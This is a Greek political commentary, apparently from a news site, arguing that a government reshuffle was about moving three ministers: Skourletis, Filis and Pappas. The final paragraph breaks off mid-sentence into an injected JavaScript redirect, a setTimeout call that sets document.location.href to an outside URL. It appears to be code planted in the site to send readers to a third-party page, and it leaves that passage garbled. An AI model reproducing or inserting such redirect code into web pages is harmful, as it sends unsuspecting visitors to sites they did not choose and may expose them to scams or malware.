Όλα έγιναν για να φύγει ο Φίλης, να αλλάξει υπουργείο ο Σκουρλέτης και να εξοριστεί ο Παππάς

0
28

 

Τελικά, ο ανασχηματισμός έγινε για τρία πρόσωπα και ισάριθμα μέτωπα, τα οποία ήθελε να κλείσει ο πρωθυπουργός, χωρίς να υπάρξει καμιά περαιτέρω έκπληξη ή ανατροπή.

Θέμα πρώτον, η απομάκρυνση από το υπουργείο Ενέργειας του Πάνου Σκουρλέτη, ο οποίος διαφωνούσε απολύτως με την ιδιωτικοποίηση του 17% της ΔΕΗ, παρότι αποτελεί μνημονιακή υποχρέωση που είχε και ο ίδιος ψηφίσει. Δήλωνε πως δεν θα αποδεχθεί κανένα άλλο υπουργείο, ωστόσο είπε «ναι» στο πρώτο τη τάξει υπουργείο Εσωτερικών. Στη θέση του τοποθετήθηκε ο «ευέλικτος» Γιώργος Σταθάκης.

Θέμα δεύτερον, η απομάκρυνση από το υπουργείο Παιδείας του Νίκου Φίλη, ο οποίος είχε έρθει σε ρήξη με τον αρχιεπίσκοπο για το μάθημα των θρησκευτικών. Και μπορεί η θέση του αυτή να κέρδισε τη στήριξη των συνέδρων, δηλαδή των εκπροσώπων της κοινωνικής βάσης του Σύριζα, ωστόσο ο πρωθυπουργός ήθελε να κλείσει το μέτωπο με την Εκκλησία. Του πρότεινε, λοιπόν, να πάει σε άλλο υπουργείο, εκείνος όμως δεν μετέβαλε άποψη -όπως ο Πάνος Σκουρλέτης- και προτίμησε να μείνει μόνο βουλευτής.

Θέμα τρίτον, η «τιμωρία» του Νίκου Παππά, ο οποίος παρέσυρε την κυβέρνηση σε δεινή ήττα, στον μόνο τομέα που ήταν «καβάλα στ’ άλογο», στις τηλεοπτικές άδειες. Έτσι, ο Αλέξης Τσίπρας του έδωσε το νεοσυσταθέν υπουργείο Ψηφιακής πολιτικής για τα ΜΜΕ και τον «εξόρισε» από το Μέγαρο Μαξίμου. Στη θέση του τοποθετήθηκε ο Χριστόφορος Βερναρδάκης.

Όλα τα υπόλοιπα είναι χωρίς ιδιαίτερη σημασία. Το μόνο ενδιαφέρον είναι η απομάκρυνση από το υπουργείο Εργασίας του Γιώργου Κατρούγκαλου, ο οποίος κινδύνευε να γίνει νούμερο σε επιθεωρήσεις... setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here